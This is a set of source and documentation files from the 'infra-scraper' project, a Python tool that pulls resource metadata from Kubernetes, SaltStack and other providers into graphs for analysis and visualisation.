figure:: ../static/img/arc-diagram.png\n   :width: 100%\n   :figclass: align-center\n\n   Arc diagram of OpenStack project's resources (cca 100 nodes)\n\n\nMore Information\n================\n\n* https://bl.ocks.org/rpgove/53bb49d6ed762139f33bdaea1f3a9e1c\n* https://en.wikipedia.org/wiki/Arc_diagram" }, { "alpha_fraction": 0.7656537890434265, "alphanum_fraction": 0.7670350074768066, "avg_line_length": 35.79661178588867, "blob_id": "3ba516fb54be58687f2699fe6b890d51f1a45607", "content_id": "4c593efaa4c47a5afc48558aebf05c1825fe8de3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2172, "license_type": "permissive", "max_line_length": 106, "num_lines": 59, "path": "/doc/source/text/layout-index.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n=====================\nVisualization Layouts\n=====================\n\n``Graph drawing`` or ``network diagram`` is a pictorial representation of the\nvertices and edges of a graph. This drawing should not be confused with the\ngraph itself; very different layouts can correspond to the same graph. In the\nabstract, all that matters is which pairs of vertices are connected by edges.\nIn the concrete, however, the arrangement of these vertices and edges within a\ndrawing affects its understandability, usability, fabrication cost, and\naesthetics.\n\nThe problem gets worse if the graph changes over time by adding and deleting\nedges (dynamic graph drawing) and the goal is to preserve the user's mental\nmap.\n\n\nConventions\n===========\n\nGraphs are frequently drawn as ``node-link diagrams`` in which the vertices\nare represented as disks, boxes, or textual labels and the edges are\nrepresented as line segments, polylines, or curves in the Euclidean plane.\n\nNode-link diagrams can be traced back to the 13th century work of Ramon Llull,\nwho drew diagrams of this type for complete graphs in order to analyze all\npairwise combinations among sets of metaphysical concepts.\n\nAlternative conventions to ``node-link diagrams`` include:\n\n\t``Adjacency representations`` such as ``circle packings``, in which vertices\n\tare represented by disjoint regions in the plane and edges are represented by\n\tadjacencies between regions.\n\n\t``Intersection representations`` in which vertices are represented by non-\n\tdisjoint geometric objects and edges are represented by their intersections.\n\n\t``Visibility representations`` in which vertices are represented by regions in\n\tthe plane and edges are represented by regions that have an unobstructed line\n\tof sight to each other.\n\n\t``Confluent drawings``, in which edges are represented as smooth curves within mathematical train tracks.\n\n\t``Fabrics``, in which nodes are represented as horizontal lines and edges as vertical lines.\n\n\tVisualizations of the ``adjacency matrix`` of the graph.\n\n\n.. toctree::\n   :maxdepth: 2\n\n   layout-arc.rst\n   layout-bundle.rst\n   layout-force.rst\n   layout-hive.rst\n   layout-matrix.rst\n\n.. 
layout-treemap.rst\n" }, { "alpha_fraction": 0.5673122406005859, "alphanum_fraction": 0.5729806423187256, "avg_line_length": 28.81690216064453, "blob_id": "ccb4652fc52b72201051f5763a530494c86c4bd3", "content_id": "d82ca0e6905a4f5b2df3bd4691ef051e155b946d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2117, "license_type": "permissive", "max_line_length": 77, "num_lines": 71, "path": "/setup.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom setuptools import setup, find_packages\n\nVERSION = '0.4'\n\nwith open('README.rst') as readme:\n LONG_DESCRIPTION = ''.join(readme.readlines())\n\nDESCRIPTION = \"\"\"Infrastrucutre metadata scraper with support for multiple\nresource providers and tools for relational analysis and visualization.\"\"\"\n\nsetup(\n name='infra-scraper',\n version=VERSION,\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n author='Aleš Komárek',\n author_email='[email protected]',\n license='Apache License, Version 2.0',\n url='https://github.com/cznewt/infra-scraper/',\n packages=find_packages(),\n install_requires=[\n 'pyyaml',\n 'msgpack-python',\n 'Flask',\n 'Click',\n 'os_client_config',\n 'python-cinderclient',\n 'python-glanceclient',\n 'python-heatclient',\n 'python-keystoneclient',\n 'python-novaclient',\n 'python-neutronclient',\n 'pykube',\n 'boto3',\n 'tosca-parser',\n 'salt-pepper',\n 'python-terraform',\n 'pydot',\n 'graphviz',\n 'juju'\n ],\n extras_require={\n 'tests': [\n 'pytest',\n 'flake8'],\n 'docs': [\n 'sphinx >= 1.4',\n 'sphinx_rtd_theme']\n },\n classifiers=[\n 'Intended Audience :: System Administrators',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n ],\n entry_points={\n 'console_scripts': [\n 'scraper_web = infra_scraper.cli:runserver',\n 'scraper_status = infra_scraper.cli:status',\n 'scraper_get = infra_scraper.cli:scrape',\n 'scraper_get_forever = infra_scraper.cli:scrape_forever',\n 'scraper_get_all = infra_scraper.cli:scrape_all',\n 'scraper_get_all_forever = infra_scraper.cli:scrape_all_forever',\n ],\n },\n)\n" }, { "alpha_fraction": 0.5571625232696533, "alphanum_fraction": 0.5646522045135498, "avg_line_length": 41.08695602416992, "blob_id": "3b9359bba72dd110366a3846b5143669d5f1aecc", "content_id": "e42b62ed34fc245d0759e3594f8a9bf9101a6e83", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11616, "license_type": "permissive", "max_line_length": 98, "num_lines": 276, "path": "/infra_scraper/input/kubernetes.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport os\nimport yaml\nimport tempfile\nimport pykube\nfrom requests.exceptions import HTTPError\nfrom infra_scraper.input.base import BaseInput\nfrom infra_scraper.utils import setup_logger\n\nlogger = setup_logger('input.kubernetes')\n\n\nclass KubernetesInput(BaseInput):\n\n def __init__(self, **kwargs):\n self.kind = 'kubernetes'\n self.scope = kwargs.get('scope', 'local')\n super(KubernetesInput, self).__init__(**kwargs)\n config_file, filename = tempfile.mkstemp()\n config_content = {\n 'apiVersion': 'v1',\n 'clusters': [{\n 'cluster': self.config['cluster'],\n 'name': 
self.name,\n }],\n 'contexts': [{\n 'context': {\n 'cluster': self.name,\n 'user': self.name,\n },\n 'name': self.name,\n }],\n 'current-context': self.name,\n 'kind': 'Config',\n 'preferences': {},\n 'users': [{\n 'name': self.name,\n 'user': self.config['user']\n }]\n }\n os.write(config_file, yaml.safe_dump(config_content).encode())\n os.close(config_file)\n self.config_wrapper = pykube.KubeConfig.from_file(filename)\n os.remove(filename)\n self.api = pykube.HTTPClient(self.config_wrapper)\n\n def scrape_all_resources(self):\n self.scrape_config_maps()\n self.scrape_cron_jobs()\n self.scrape_daemon_sets()\n self.scrape_deployments()\n self.scrape_endpoints()\n self.scrape_events()\n self.scrape_horizontal_pod_autoscalers()\n self.scrape_ingresses()\n self.scrape_jobs()\n if self.scope == 'global':\n self.scrape_namespaces()\n self.scrape_nodes()\n self.scrape_persistent_volumes()\n self.scrape_persistent_volume_claims()\n self.scrape_pods()\n self.scrape_replica_sets()\n self.scrape_replication_controllers()\n self.scrape_roles()\n self.scrape_secrets()\n self.scrape_service_accounts()\n self.scrape_services()\n self.scrape_stateful_sets()\n self.scrape_containers()\n\n def _create_relations(self):\n\n namespace_2_uid = {}\n for resource_id, resource in self.resources.get('k8s_namespace', {}).items():\n resource_mapping = resource['metadata']['metadata']['name']\n namespace_2_uid[resource_mapping] = resource_id\n\n node_2_uid = {}\n for resource_id, resource in self.resources.get('k8s_node', {}).items():\n resource_mapping = resource['metadata']['metadata']['name']\n node_2_uid[resource_mapping] = resource_id\n\n secret_2_uid = {}\n for resource_id, resource in self.resources.get('k8s_secret', {}).items():\n resource_mapping = resource['metadata']['metadata']['name']\n secret_2_uid[resource_mapping] = resource_id\n\n volume_2_uid = {}\n for resource_id, resource in self.resources.get('k8s_persistent_volume', {}).items():\n resource_mapping = resource['metadata']['metadata']['name']\n volume_2_uid[resource_mapping] = resource_id\n\n service_run_2_uid = {}\n service_app_2_uid = {}\n for resource_id, resource in self.resources.get('k8s_service', {}).items():\n if resource['metadata']['spec'].get('selector', {}) is not None:\n if resource['metadata']['spec'].get('selector', {}).get('run', False):\n selector = resource['metadata']['spec']['selector']['run']\n service_run_2_uid[selector] = resource_id\n if resource['metadata']['spec'].get('selector', {}).get('app', False):\n selector = resource['metadata']['spec']['selector']['app']\n service_app_2_uid[selector] = resource_id\n\n # Define relationships between namespace and all namespaced resources.\n for resource_type, resource_dict in self.resources.items():\n for resource_id, resource in resource_dict.items():\n if 'namespace' in resource.get('metadata', {}).get('metadata', {}):\n self._scrape_relation(\n 'in_k8s_namespace',\n resource_id,\n namespace_2_uid[resource['metadata']['metadata']['namespace']])\n\n # Define relationships between service accounts and secrets\n for resource_id, resource in self.resources.get('k8s_service_account', {}).items():\n for secret in resource['metadata']['secrets']:\n self._scrape_relation('use_k8s_secret',\n resource_id,\n secret_2_uid[secret['name']])\n \"\"\"\n for resource_id, resource in self.resources['k8s_persistent_volume'].items():\n self._scrape_relation('k8s_persistent_volume-k8s_persistent_volume_claim',\n resource_id,\n volume_2_uid[resource['spec']['volumeName']])\n \"\"\"\n\n # Define 
relationships between replica sets and deployments\n        for resource_id, resource in self.resources.get('k8s_replica_set', {}).items():\n            deployment_id = resource['metadata']['metadata']['ownerReferences'][0]['uid']\n            self._scrape_relation(\n                'in_k8s_deployment',\n                resource_id,\n                deployment_id)\n\n        for resource_id, resource in self.resources.get('k8s_pod', {}).items():\n            # Define relationships between pods and nodes\n            if resource['metadata']['spec']['nodeName'] is not None:\n                node = resource['metadata']['spec']['nodeName']\n                self._scrape_relation('on_k8s_node',\n                                      resource_id,\n                                      node_2_uid[node])\n\n            # Define relationships between pods and replication sets and\n            # replication controllers.\n            if resource['metadata']['metadata'].get('ownerReferences', False):\n                if resource['metadata']['metadata']['ownerReferences'][0]['kind'] == 'ReplicaSet':\n                    rep_set_id = resource['metadata']['metadata']['ownerReferences'][0]['uid']\n                    self._scrape_relation(\n                        'use_k8s_replication',\n                        rep_set_id,\n                        resource_id)\n\n            # Define relationships between pods and services.\n            if resource['metadata']['metadata']['labels'].get('run', False):\n                selector = resource['metadata']['metadata']['labels']['run']\n                self._scrape_relation(\n                    'in_k8s_pod',\n                    service_run_2_uid[selector],\n                    resource_id)\n            if resource['metadata']['metadata']['labels'].get('app', False):\n                try:\n                    selector = resource['metadata']['metadata']['labels']['app']\n                    self._scrape_relation(\n                        'in_k8s_pod',\n                        service_app_2_uid[selector],\n                        resource_id)\n                except Exception:\n                    pass\n\n    def _scrape_k8s_resources(self, response, kind):\n        try:\n            for item in response:\n                resource = item.obj\n                self._scrape_resource(resource['metadata']['uid'],\n                                      resource['metadata']['name'],\n                                      kind, None, metadata=resource)\n        except HTTPError as exception:\n            logger.error(exception)\n\n    def scrape_containers(self):\n        for resource_id, resource in self.resources['k8s_pod'].items():\n            for container in resource['metadata']['spec']['containers']:\n                container_id = \"{}-{}\".format(resource_id,\n                                              container['name'])\n                self._scrape_resource(container_id,\n                                      container['name'],\n                                      'k8s_container', None,\n                                      metadata=container)\n                self._scrape_relation('in_k8s_pod',\n                                      container_id,\n                                      resource_id)\n\n    def scrape_config_maps(self):\n        response = pykube.ConfigMap.objects(self.api)\n        self._scrape_k8s_resources(response, 'k8s_config_map')\n\n    def scrape_cron_jobs(self):\n        response = pykube.CronJob.objects(self.api)\n        self._scrape_k8s_resources(response, 'k8s_cron_job')\n\n    def scrape_daemon_sets(self):\n        response = pykube.DaemonSet.objects(self.api)\n        self._scrape_k8s_resources(response, 'k8s_daemon_set')\n\n    def scrape_deployments(self):\n        response = pykube.Deployment.objects(self.api)\n        self._scrape_k8s_resources(response, 'k8s_deployment')\n\n    def scrape_endpoints(self):\n        response = pykube.Endpoint.objects(self.api)\n        self._scrape_k8s_resources(response, 'k8s_endpoint')\n\n    def scrape_events(self):\n        response = pykube.Event.objects(self.api)\n        self._scrape_k8s_resources(response, 'k8s_event')\n\n    def scrape_horizontal_pod_autoscalers(self):\n        response = pykube.HorizontalPodAutoscaler.objects(self.api)\n        self._scrape_k8s_resources(response, 'k8s_horizontal_pod_autoscaler')\n\n    def scrape_ingresses(self):\n        response = pykube.Ingress.objects(self.api)\n        self._scrape_k8s_resources(response, 'k8s_ingress')\n\n    def scrape_jobs(self):\n        response = pykube.Job.objects(self.api)\n        self._scrape_k8s_resources(response, 'k8s_job')\n\n    def scrape_namespaces(self):\n        response = pykube.Namespace.objects(self.api)\n        
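# Namespaces are cluster-wide; they are scraped only for endpoints with 'global' scope.\n        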
self._scrape_k8s_resources(response, 'k8s_namespace')\n\n def scrape_nodes(self):\n response = pykube.Node.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_node')\n\n def scrape_persistent_volumes(self):\n response = pykube.PersistentVolume.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_persistent_volume')\n\n def scrape_persistent_volume_claims(self):\n response = pykube.PersistentVolumeClaim.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_persistent_volume_claim')\n\n def scrape_pods(self):\n response = pykube.Pod.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_pod')\n\n def scrape_replica_sets(self):\n response = pykube.ReplicaSet.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_replica_set')\n\n def scrape_replication_controllers(self):\n response = pykube.ReplicationController.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_replication_controller')\n\n def scrape_roles(self):\n response = pykube.Role.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_role')\n\n def scrape_secrets(self):\n response = pykube.Secret.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_secret')\n\n def scrape_service_accounts(self):\n response = pykube.ServiceAccount.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_service_account')\n\n def scrape_services(self):\n response = pykube.Service.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_service')\n\n def scrape_stateful_sets(self):\n response = pykube.StatefulSet.objects(self.api)\n self._scrape_k8s_resources(response, 'k8s_stateful_set')\n" }, { "alpha_fraction": 0.43393394351005554, "alphanum_fraction": 0.43588587641716003, "avg_line_length": 41.15189743041992, "blob_id": "a7cbbc662f4f53e5c0107a6ac9d6eaa0a2e44a0a", "content_id": "83a97919eb3fb3d7fd023b028f2288f502756d53", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6660, "license_type": "permissive", "max_line_length": 87, "num_lines": 158, "path": "/infra_scraper/input/saltstack.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom pepper.libpepper import Pepper\nfrom infra_scraper.input.base import BaseInput\nfrom infra_scraper.utils import setup_logger\n\nlogger = setup_logger('input.salt')\n\n\nclass SaltStackInput(BaseInput):\n\n def __init__(self, **kwargs):\n self.kind = 'salt'\n super(SaltStackInput, self).__init__(**kwargs)\n self.api = Pepper(self.config['auth_url'])\n self.api.login(self.config['username'],\n self.config['password'],\n 'pam')\n\n def scrape_all_resources(self):\n self.scrape_jobs()\n self.scrape_minions()\n self.scrape_services()\n self.scrape_high_states()\n # self.scrape_low_states()\n\n def _create_relations(self):\n \"\"\"\n for resource_id, resource in self.resources['salt_low_state'].items():\n # Define relationships between low states and nodes.\n self._scrape_relation(\n 'salt_minion-salt_low_state',\n resource['metadata']['minion'],\n resource_id)\n split_service = resource['metadata']['__sls__'].split('.')\n self._scrape_relation(\n 'salt_service-salt_low_state',\n '{}|{}.{}'.format(resource['metadata']['minion'],\n split_service[0], split_service[1]),\n resource_id)\n \"\"\"\n for resource_id, resource in self.resources.get('salt_high_state', {}).items():\n # Define relationships between high states and nodes.\n self._scrape_relation(\n 'on_salt_minion',\n resource_id,\n resource['metadata']['minion'])\n 
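# Derive the owning service key from the state's __sls__ file path.\n            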
split_service = resource['metadata']['__sls__'].split('.')\n self._scrape_relation(\n 'contains_salt_high_state',\n '{}|{}.{}'.format(resource['metadata']['minion'],\n split_service[0], split_service[1]),\n resource_id)\n\n for resource_id, resource in self.resources.get('salt_service', {}).items():\n self._scrape_relation(\n 'on_salt_minion',\n resource_id,\n resource['metadata']['host'])\n\n for resource_id, resource in self.resources.get('salt_job', {}).items():\n self._scrape_relation(\n 'by_salt_user',\n resource_id,\n resource['metadata']['User'])\n for minion_id, result in resource['metadata'].get('Result', {}).items():\n self._scrape_relation(\n 'on_salt_minion',\n resource_id,\n minion_id)\n if type(result) is list:\n logger.error(result[0])\n else:\n for state_id, state in result.items():\n if '__id__' in state:\n result_id = '{}|{}'.format(minion_id, state['__id__'])\n self._scrape_relation(\n 'contains_salt_high_state',\n resource_id,\n result_id)\n\n def scrape_jobs(self):\n response = self.api.low([{\n 'client': 'runner',\n 'fun': 'jobs.list_jobs',\n 'arg': \"search_function='[\\\"state.apply\\\", \\\"state.sls\\\"]'\"\n }]).get('return')[0]\n for job_id, job in response.items():\n if job['Function'] in ['state.apply', 'state.sls']:\n result = self.api.lookup_jid(job_id).get('return')[0]\n job['Result'] = result\n self._scrape_resource(job_id,\n job['Function'],\n 'salt_job', None, metadata=job)\n self._scrape_resource(job['User'],\n job['User'],\n 'salt_user', None, metadata={})\n\n def scrape_minions(self):\n response = self.api.low([{\n 'client': 'local',\n 'tgt': '*',\n 'fun': 'grains.items'\n }]).get('return')[0]\n for minion_id, minion in response.items():\n self._scrape_resource(minion_id,\n minion_id,\n 'salt_minion', None, metadata=minion)\n\n def scrape_services(self):\n response = self.api.low([{\n 'client': 'local',\n 'expr_form': 'compound',\n 'tgt': 'I@salt:master',\n 'fun': 'saltresource.graph_data'\n }]).get('return')[0]\n for minion_id, minion in response.items():\n for service in minion['graph']:\n self._scrape_resource('{}|{}'.format(minion_id,\n service['service']),\n service['service'],\n 'salt_service', None,\n metadata=service)\n\n def scrape_low_states(self):\n response = self.api.low([{\n 'client': 'local',\n 'tgt': '*',\n 'fun': 'state.show_lowstate'\n }]).get('return')[0]\n for minion_id, low_states in response.items():\n for low_state in low_states:\n low_state['minion'] = minion_id\n self._scrape_resource('{}|{}|{}'.format(minion_id,\n low_state['state'],\n low_state['__id__']),\n '{} {}'.format(low_state['state'],\n low_state['__id__']),\n 'salt_low_state', None,\n metadata=low_state)\n\n def scrape_high_states(self):\n response = self.api.low([{\n 'client': 'local',\n 'tgt': '*',\n 'fun': 'state.show_highstate'\n }]).get('return')[0]\n for minion_id, high_states in response.items():\n if type(high_states) is list:\n logger.error(high_states[0])\n else:\n for high_state_id, high_state in high_states.items():\n high_state['minion'] = minion_id\n self._scrape_resource('{}|{}'.format(minion_id,\n high_state_id),\n high_state_id,\n 'salt_high_state', None,\n metadata=high_state)\n" }, { "alpha_fraction": 0.5402425527572632, "alphanum_fraction": 0.5406100749969482, "avg_line_length": 33.871795654296875, "blob_id": "eb9dec917c8538ccc0b7b2b70b034bd86b1ddc4c", "content_id": "619dc3e16594cd458d85f4cde8a0d33d6e1a87c1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2721, 
"license_type": "permissive", "max_line_length": 74, "num_lines": 78, "path": "/infra_scraper/storage/file.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nfrom .base import BaseStorage\nimport os\nimport glob\nimport yaml\nimport msgpack\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass FileStorage(BaseStorage):\n\n def __init__(self, **kwargs):\n super(FileStorage, self).__init__(**kwargs)\n self.storage_dir = kwargs.get('storage_dir', '/tmp/scraper')\n try:\n os.stat(self.storage_dir)\n except Exception:\n os.mkdir(self.storage_dir)\n\n def _storage_dir_exist(self, name):\n try:\n os.stat(self._get_storage_dir(name))\n except Exception:\n os.mkdir(self._get_storage_dir(name))\n\n def _get_storage_dir(self, name):\n return os.path.join(self.storage_dir, name)\n\n def _get_last_timestamp(self, name):\n sinks = glob.glob('{}/*.yaml'.format(self._get_storage_dir(name)))\n last_sink = max(sinks, key=os.path.getctime)\n return last_sink.split('/')[-1].replace('.yaml', '')\n\n def save_data(self, name, data):\n self._storage_dir_exist(name)\n filename = '{}/{}.yaml'.format(self._get_storage_dir(name),\n data['timestamp'])\n with open(filename, 'w') as outfile:\n yaml.safe_dump(data, outfile, default_flow_style=False)\n outfile.close()\n self.last_timestamp = data['timestamp']\n\n def load_data(self, name):\n data = None\n self.last_timestamp = self._get_last_timestamp(name)\n filename = '{}/{}.yaml'.format(self._get_storage_dir(name),\n self.last_timestamp)\n with open(filename, 'r') as stream:\n try:\n data = yaml.load(stream)\n except yaml.YAMLError as exception:\n logger.error(exception)\n stream.close()\n return data\n\n def save_output_data(self, name, kind, data):\n self._storage_dir_exist(name)\n filename = '{}/{}-{}.yml'.format(self._get_storage_dir(name),\n data['timestamp'],\n kind)\n with open(filename, 'w') as outfile:\n yaml.safe_dump(data, outfile, default_flow_style=False)\n outfile.close()\n\n def load_output_data(self, name, kind):\n last_timestamp = self._get_last_timestamp(name)\n data = None\n filename = '{}/{}-{}.yml'.format(self._get_storage_dir(name),\n last_timestamp, kind)\n with open(filename, 'r') as stream:\n try:\n data = yaml.load(stream.read())\n except Exception as exception:\n logger.error(exception)\n data = None\n stream.close()\n return data\n" }, { "alpha_fraction": 0.545976996421814, "alphanum_fraction": 0.5541871786117554, "avg_line_length": 31.026315689086914, "blob_id": "eb9507cdc9246d1e9c1cfc076c034535f91230b6", "content_id": "befbadbb391d08b7b30a2bfb1d72f5fce8c4005d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1218, "license_type": "permissive", "max_line_length": 68, "num_lines": 38, "path": "/infra_scraper/storage/etcd.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nfrom .base import BaseStorage\nimport os\nimport etcd\nimport yaml\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass EtcdStorage(BaseStorage):\n\n def __init__(self, **kwargs):\n super(EtcdStorage, self).__init__(**kwargs)\n self.client = etcd.Client(\n host='127.0.0.1', port=4003)\n self.storage_path = '/scrape'\n\n def _get_storage_path(self, name):\n return os.path.join(self.storage_path, self.name)\n\n def save_data(self, name, data):\n filename = os.path.join(self._get_storage_path(),\n data['timestamp'])\n with open(filename, 'w') as outfile:\n yaml.safe_dump(data, outfile, default_flow_style=False)\n 
self.last_timestamp = data['timestamp']\n\n    def load_data(self, name):\n        data = None\n        if self.last_timestamp is not None:\n            filename = '{}/{}.yaml'.format(self._get_storage_path(),\n                                           self.last_timestamp)\n            with open(filename, 'r') as stream:\n                try:\n                    data = yaml.load(stream)\n                except yaml.YAMLError as exception:\n                    logger.error(exception)\n        return data\n" }, { "alpha_fraction": 0.6240000128746033, "alphanum_fraction": 0.6377142667770386, "avg_line_length": 20.34883689880371, "blob_id": "6ea5c19749df07dbc086aa00bcf56ab0cb5490b2", "content_id": "1fabf3e0aad700bff76798ace23bb88f69712c79", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 875, "license_type": "permissive", "max_line_length": 65, "num_lines": 43, "path": "/doc/source/conf.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport sys\nimport os\n\nsys.path.insert(0, os.path.abspath('..'))\n\nextensions = [\n    'sphinx.ext.autodoc',\n    'sphinx.ext.doctest',\n    'sphinx.ext.intersphinx',\n    'sphinx.ext.todo',\n    'sphinx.ext.coverage',\n    'sphinx.ext.imgmath',\n    'sphinx.ext.viewcode',\n]\n\ntemplates_path = ['_templates']\nsource_suffix = '.rst'\nmaster_doc = 'index'\nproject = u'InfraScraper'\ncopyright = u'2017, Aleš Komárek'\nversion = '0.2'\nrelease = '0.2.0'\nexclude_patterns = []\npygments_style = 'sphinx'\n\nhtml_theme = \"sphinx_rtd_theme\"\nhtml_theme_options = {\n    'collapse_navigation': False,\n    'display_version': False,\n}\n\nlatex_elements = {}\nlatex_documents = [\n    ('index', 'infra_scraper.tex', u'InfraScraper Documentation',\n     u'InfraScraper Team', 'manual'),\n]\n\nman_pages = [\n    ('index', 'infra_scraper', u'InfraScraper Documentation',\n     [u'Komarek'], 1)\n]\n" }, { "alpha_fraction": 0.6901960968971252, "alphanum_fraction": 0.6996078491210938, "avg_line_length": 18.90625, "blob_id": "3ad9e55b87584632af67355cfa2f350a949d7ed3", "content_id": "41e24ce630e854b04c527c6a775842f2ca7a0c0c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1275, "license_type": "permissive", "max_line_length": 52, "num_lines": 64, "path": "/infra_scraper/cli.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nimport click\nimport yaml\nimport logging\nfrom infra_scraper.main import InfraScraper\nfrom infra_scraper.server import run\n\nlogger = logging.getLogger(__name__)\n\n\[email protected]()\ndef cli():\n    pass\n\n\[email protected]()\[email protected]('name')\ndef scrape(name):\n    scraper = InfraScraper()\n    scraper.scrape_data(name)\n\n\[email protected]()\[email protected]('name')\[email protected]('interval', default=10)\ndef scrape_forever(name, interval):\n    scraper = InfraScraper()\n    scraper.scrape_data_forever(name, int(interval))\n\n\[email protected]()\ndef scrape_all():\n    scraper = InfraScraper()\n    scraper.scrape_all_data()\n\n\[email protected]()\[email protected]('--interval', default=10)\ndef scrape_all_forever(interval):\n    scraper = InfraScraper()\n    scraper.scrape_all_data_forever(int(interval))\n\n\[email protected]()\ndef status():\n    scraper = InfraScraper()\n    print(yaml.safe_dump(scraper.status()))\n\n\[email protected]()\[email protected]('--host', default=\"0.0.0.0\")\[email protected]('--port', default=8076)\ndef runserver(host, port):\n    run(host=host, 
port=port)\n\n\ncli.add_command(status)\ncli.add_command(scrape)\ncli.add_command(runserver)\ncli.add_command(scrape_all)\ncli.add_command(scrape_forever)\ncli.add_command(scrape_all_forever)\n\nif __name__ == '__main__':\n    cli()\n" }, { "alpha_fraction": 0.5663265585899353, "alphanum_fraction": 0.5663265585899353, "avg_line_length": 23.375, "blob_id": "04954380a909c49404a24e5e1b5acb649fc29b54", "content_id": "16b0950364b15a5f36aed39f330a5890073832f3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 196, "license_type": "permissive", "max_line_length": 53, "num_lines": 8, "path": "/doc/source/text/input-saltstack.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n=========================\nSaltStack Infrastructures\n=========================\n\nConfiguration for connecting to the Salt API.\n\n.. literalinclude:: ../static/config/config-salt.yaml\n   :language: yaml\n" }, { "alpha_fraction": 0.6607543230056763, "alphanum_fraction": 0.6788648366928101, "avg_line_length": 24.78972625732422, "blob_id": "6f380d2bb8494ff8bcb9342d2dca306a8dda9ee4", "content_id": "8551b08407528c3dd102f16537e261a55e7ca5f9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 16070, "license_type": "permissive", "max_line_length": 78, "num_lines": 623, "path": "/README.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n===============================\nInfrastructure Metadata Scraper\n===============================\n\nThe aim of this project is to acquire live infrastructure topology data from\nany resource provider for further relational analysis and visualisations.\n\n\nMetadata Collection\n===================\n\nThe pull approach for scraping endpoint APIs is supported for the moment;\npush-based processing of data from target services will be supported later.\n\nCurrently supported resource metadata providers are:\n\n* Kubernetes clusters\n* OpenStack clouds\n* Amazon Web Services\n* SaltStack infrastructures\n* Terraform templates\n* Jenkins pipelines\n\nThe following resource providers are to be integrated in the near future:\n\n* GCE and Azure clouds\n* Cloudify TOSCA blueprints\n* MAAS servers\n* Juju templates\n\nFrom these resource providers we are able to capture all available resources\nfor a given endpoint.\n\nRelational Analysis\n===================\n\nThe output of scraping is a directed graph that can be the subject of further\nanalysis. We can perform several transformation functions on the graphs.\n\n\nGraph Analysis\n--------------\n\nYou can alter the scraped structures in several ways. Either you get a subset\nof the resources (vertices and edges), or you combine multiple graphs and\nlink the same nodes in each.\n\n\nSubgraphs - Slicing and Dicing\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nTo slice and dice is to break a body of information down into smaller parts or\nto examine it from different viewpoints so that we can understand it better.\n\nIn cooking, you can slice a vegetable or other food or you can dice it (which\nmeans to break it down into small cubes). One approach to dicing is to first\nslice and then cut the slices up into dices.\n\nIn data analysis, the term generally implies a systematic reduction of a body\nof data into smaller parts or views that will yield more information. The term\nis also used to mean the presentation of information in a variety of different\nand useful ways. 
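\n\nAs a simple illustration of slicing, a scraped snapshot can be loaded into a\ngraph library and reduced to a subset of nodes. The following is a minimal\nsketch, assuming the snapshot dictionary produced by the scraper inputs and\nthe third-party ``networkx`` package (which is not among this project's\ndependencies); the project uid is purely illustrative:\n\n.. code-block:: python\n\n    import networkx as nx\n\n    graph = nx.DiGraph()\n    # Nodes come from the scraped 'resources' mapping (kind -> uid -> item).\n    for kind, items in snapshot['resources'].items():\n        for uid, item in items.items():\n            graph.add_node(uid, kind=kind, name=item['name'])\n    # Edges come from the scraped 'relations' mapping (kind -> list of links).\n    for kind, links in snapshot['relations'].items():\n        for link in links:\n            graph.add_edge(link['source'], link['target'], kind=kind)\n\n    # Slice: keep one project and every resource pointing directly at it.\n    project_uid = 'illustrative-project-uid'\n    keep = {project_uid} | set(graph.predecessors(project_uid))\n    subgraph = graph.subgraph(keep)\n\n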
